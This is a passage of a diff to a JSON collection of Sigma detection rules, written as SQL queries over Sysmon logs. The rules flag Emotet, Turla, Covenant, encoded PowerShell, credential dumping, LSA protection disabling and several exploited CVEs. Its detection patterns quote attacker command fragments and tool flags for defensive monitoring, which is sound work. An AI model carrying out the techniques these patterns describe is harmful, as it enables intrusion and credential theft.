'%kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA%' ESCAPE '\\' OR CommandLine LIKE '%IgAoACcAKgAnACkAOwAkA%' ESCAPE '\\' OR CommandLine LIKE '%IAKAAnACoAJwApADsAJA%' ESCAPE '\\' OR CommandLine LIKE '%iACgAJwAqACcAKQA7ACQA%' ESCAPE '\\' OR CommandLine LIKE '%JABGAGwAeAByAGgAYwBmAGQ%' ESCAPE '\\' OR CommandLine LIKE '%PQAkAGUAbgB2ADoAdABlAG0AcAArACgA%' ESCAPE '\\' OR CommandLine LIKE '%0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA%' ESCAPE '\\' OR CommandLine LIKE '%9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ%' ESCAPE '\\' OR CommandLine LIKE '%wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA%' ESCAPE '\\' OR CommandLine LIKE '%8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine REGEXP '\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ \"']{1}')" ], - "filename": "proc_creation_win_malware_emotet.yml" + "filename": "proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml" }, { - "title": "File Download Via Bitsadmin To A Suspicious Target Folder", - "id": "2ddef153-167b-4e89-86b6-757a9e65dcac", - "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE", + "id": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", + "status": "test", + "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/config%' ESCAPE '\\' AND CommandLine LIKE '%/serverlevelplugindll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml" + "filename": "proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml" }, { - "title": "Suspicious PrinterPorts Creation (CVE-2020-1048)", - "id": "cc08d590-8b90-413a-aff6-31d1a99678d7", + "title": "Invoke-Obfuscation Via Use Clip", + "id": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", "status": "test", - "description": "Detects new commands that add new printer port which point to suspicious file", - "author": "EagleEye Team, Florian Roth", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", + "attack.defense_evasion", + "attack.t1027", "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "New printer port install on host" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Add-PrinterPort -Name%' ESCAPE '\\' AND (CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\')) OR CommandLine LIKE '%Generic / Text Only%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%clip%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%clipboard%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%i`%' ESCAPE '\\' OR CommandLine LIKE '%n`%' ESCAPE '\\' OR CommandLine LIKE '%v`%' ESCAPE '\\' OR CommandLine LIKE '%o`%' ESCAPE '\\' OR CommandLine LIKE '%k`%' ESCAPE '\\' OR CommandLine LIKE '%e`%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2020_1048.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Potential Credential Dumping Via LSASS Process Clone", - "id": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", - "status": "test", - "description": "Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden", + "title": "Boot Configuration Tampering Via Bcdedit.EXE", + "id": "1444443e-6757-43e4-9ea4-c8fc705f79a2", + "status": "stable", + "description": "Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND CommandLine LIKE '%set%' ESCAPE '\\' AND ((CommandLine LIKE '%bootstatuspolicy%' ESCAPE '\\' AND CommandLine LIKE '%ignoreallfailures%' ESCAPE '\\') OR (CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_lsass_clone.yml" + "filename": "proc_creation_win_bcdedit_boot_conf_tamper.yml" }, { - "title": "Execution in Outlook Temp Folder", - "id": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", + "title": "PUA - RunXCmd Execution", + "id": "93199800-b52a-4dec-b762-75212c196542", "status": "test", - "description": "Detects a suspicious program execution in Outlook temp folder", + "description": "Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Legitimate use by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% /account=system %' ESCAPE '\\' OR CommandLine LIKE '% /account=ti %' ESCAPE '\\') AND CommandLine LIKE '%/exec=%' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_outlook_execution_from_temp.yml" + "filename": "proc_creation_win_pua_runxcmd.yml" }, { - "title": "Turla Group Commands May 2020", - "id": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", + "title": "Suspicious Kernel Dump Using Dtrace", + "id": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", "status": "test", - "description": "Detects commands used by Turla group as reported by ESET in May 2020", + "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1059.001", - "attack.t1053.005", - "attack.t1027" - ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%tracert -h 10 yahoo.com%' ESCAPE '\\' OR CommandLine LIKE '%.WSqmCons))|iex;%' ESCAPE '\\' OR CommandLine LIKE '%Fr`omBa`se6`4Str`ing%' ESCAPE '\\') OR (CommandLine LIKE '%net use https://docs.live.net%' ESCAPE '\\' AND CommandLine LIKE '%@aol.co.uk%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\dtrace.exe' ESCAPE '\\' AND CommandLine LIKE '%lkd(0)%' ESCAPE '\\') OR (CommandLine LIKE '%syscall:::return%' ESCAPE '\\' AND CommandLine LIKE '%lkd(%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_turla_comrat_may20.yml" + "filename": "proc_creation_win_dtrace_kernel_dump.yml" }, { - "title": "Format.com FileSystem LOLBIN", - "id": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", + "title": "Imports Registry Key From an ADS", + "id": "0b80ade5-6997-4b1d-99a1-71701778ea61", "status": "test", - "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ + "attack.t1112", "attack.defense_evasion" ], "falsepositives": [ @@ -10729,497 +10347,529 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\format.com' ESCAPE '\\' AND CommandLine LIKE '%/fs:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/fs:FAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:exFAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:NTFS%' ESCAPE '\\' OR CommandLine LIKE '%/fs:UDF%' ESCAPE '\\' OR CommandLine LIKE '%/fs:ReFS%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND ((CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\') AND CommandLine REGEXP ':[^ \\\\]')) AND NOT ((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_format.yml" + "filename": "proc_creation_win_regedit_import_keys_ads.yml" }, { - "title": "Suspicious PowerShell Encoded Command Patterns", - "id": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", - "status": "experimental", - "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", + "title": "Suspicious Desktopimgdownldr Command", + "id": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", + "status": "test", + "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Other tools that work with encoded scripts in the command line instead of script files" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\') AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% PAA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\')) AND NOT (((ParentImage LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% /lockscreenurl:%' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\'))) OR (CommandLine LIKE '%reg delete%' ESCAPE '\\' AND CommandLine LIKE '%\\\\PersonalizationCSP%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_encoded_cmd_patterns.yml" + "filename": "proc_creation_win_desktopimgdownldr_susp_execution.yml" }, { - "title": "Rundll32 Execution Without Parameters", - "id": "5bb68627-3198-40ca-b458-49f973db8752", - "status": "test", - "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", - "author": "Bartlomiej Czyz, Relativity", + "title": "TropicTrooper Campaign November 2018", + "id": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", + "status": "stable", + "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", + "author": "@41thexplorer, Microsoft Defender ATP", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", "attack.execution", - "attack.t1569.002" - ], - "falsepositives": [ - "False positives may occur if a user called rundll32 from CLI with no options" + "attack.t1059.001" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine IN ('rundll32.exe', 'rundll32'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_without_parameters.yml" + "filename": "proc_creation_win_apt_tropictrooper.yml" }, { - "title": "Phishing Pattern ISO in Archive", - "id": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", + "title": "Microsoft IIS Connection Strings Decryption", + "id": "97dbf6e2-e436-44d8-abee-4261b24d3e41", "status": "experimental", - "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", + "author": "Tim Rauch", "tags": [ - "attack.initial_access", - "attack.t1566" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\Winrar.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\7zFM.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\peazip.exe' ESCAPE '\\') AND (Image LIKE '%\\\\isoburn.exe' ESCAPE '\\' OR Image LIKE '%\\\\PowerISO.exe' ESCAPE '\\' OR Image LIKE '%\\\\ImgBurn.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\aspnet\\_regiis.exe' ESCAPE '\\' OR OriginalFileName LIKE 'aspnet\\_regiis.exe' ESCAPE '\\') AND (CommandLine LIKE '%connectionStrings%' ESCAPE '\\' AND CommandLine LIKE '% -pdf%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_archiver_iso_phishing.yml" + "filename": "proc_creation_win_iis_connection_strings_decryption.yml" }, { - "title": "Serv-U Exploitation CVE-2021-35211 by DEV-0322", - "id": "75578840-9526-4b2a-9462-af469a45e767", - "status": "test", - "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", - "author": "Florian Roth (Nextron Systems)", + "title": "Renamed BrowserCore.EXE Execution", + "id": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", + "status": "experimental", + "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1136.001", - "cve.2021.35211" + "attack.t1528", + "attack.t1036.003" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%whoami%' ESCAPE '\\' AND ((CommandLine LIKE '%./Client/Common/%' ESCAPE '\\' OR CommandLine LIKE '%.\\\\Client\\\\Common\\\\%' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\Serv-U.bat%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'BrowserCore.exe' AND NOT ((Image LIKE '%\\\\BrowserCore.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2021_35211_servu.yml" + "filename": "proc_creation_win_renamed_browsercore.yml" }, { - "title": "HackTool - Hashcat Password Cracker Execution", - "id": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", + "title": "WhoAmI as Parameter", + "id": "e9142d84-fbe0-401d-ac50-3e519fb00c89", "status": "test", - "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", - "author": "frack113", + "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1110.002" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Tools that use similar command line flags and values" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\hashcat.exe' ESCAPE '\\' OR (CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-m 1000 %' ESCAPE '\\' AND CommandLine LIKE '%-r %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%.exe whoami%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_hashcat.yml" + "filename": "proc_creation_win_susp_whoami_as_param.yml" }, { - "title": "LSA PPL Protection Disabled Via Reg.EXE", - "id": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", + "title": "Suspicious Serv-U Process Pattern", + "id": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", "status": "experimental", - "description": "Detects the usage of the \"reg.exe\" utility to disable PPL protection on the LSA process", + "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.010" + "attack.credential_access", + "attack.t1555", + "cve.2021.35211" ], "falsepositives": [ - "Unlikely" + "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND CommandLine LIKE '% /v RunAsPPL %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Serv-U.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_lsa_ppl_protection_disabled.yml" + "filename": "proc_creation_win_servu_susp_child_process.yml" }, { - "title": "Wab/Wabmig Unusual Parent Or Child Processes", - "id": "63d1ccc0-2a43-4f4b-9289-361b308991ff", + "title": "Execute Pcwrun.EXE To Leverage Follina", + "id": "6004abd0-afa4-4557-ba90-49d172e0a299", "status": "experimental", - "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", + "attack.t1218", "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (Image LIKE '%\\\\wab.exe' ESCAPE '\\' OR Image LIKE '%\\\\wabmig.exe' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wabmig.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\pcwrun.exe' ESCAPE '\\' AND CommandLine LIKE '%../%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wab_unusual_parents.yml" + "filename": "proc_creation_win_lolbin_pcwrun_follina.yml" }, { - "title": "Disable Windows IIS HTTP Logging", - "id": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", - "status": "experimental", - "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", - "author": "frack113", + "title": "HackTool - Covenant PowerShell Launcher", + "id": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", + "status": "test", + "description": "Detects suspicious command lines used in Covenant luanchers", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1562.002" - ], - "falsepositives": [ - "Unknown" + "attack.t1059.001", + "attack.t1564.003" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:httplogging%' ESCAPE '\\' AND CommandLine LIKE '%dontLog:true%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%-Sta%' ESCAPE '\\' AND CommandLine LIKE '%-Nop%' ESCAPE '\\' AND CommandLine LIKE '%-Window%' ESCAPE '\\' AND CommandLine LIKE '%Hidden%' ESCAPE '\\' AND (CommandLine LIKE '%-Command%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\')) OR (CommandLine LIKE '%sv o (New-Object IO.MemorySteam);sv d %' ESCAPE '\\' OR CommandLine LIKE '%mshta file.hta%' ESCAPE '\\' OR CommandLine LIKE '%GruntHTTP%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand cwB2ACAAbwAgA%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_iis_appcmd_http_logging.yml" + "filename": "proc_creation_win_hktl_covenant.yml" }, { - "title": "Potential LethalHTA Technique Execution", - "id": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", + "title": "Suspicious Splwow64 Without Params", + "id": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", "status": "test", - "description": "Detects potential LethalHTA technique where the \"mshta.exe\" is spwaned by an \"svchost.exe\" process", - "author": "Markus Neis", + "description": "Detects suspicious Splwow64.exe process without any command line parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.005" + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\mshta.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\splwow64.exe' ESCAPE '\\' AND CommandLine LIKE '%splwow64.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_mshta_lethalhta_technique.yml" + "filename": "proc_creation_win_splwow64_cli_anomaly.yml" }, { - "title": "Suspicious Schtasks Schedule Types", - "id": "24c8392b-aa3c-46b7-a545-43f71657fe98", + "title": "Suspicious Shells Spawned by Java", + "id": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", "status": "experimental", - "description": "Detects scheduled task creations or modification on a suspicious schedule type", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious shell spawned from Java host process (e.g. log4j exploitation)", + "author": "Andreas Hunkeler (@Karneades), Florian Roth", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Legitimate processes that run at logon. Filter according to your environment" + "Legitimate calls to system binaries", + "Company specific internal usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\')) 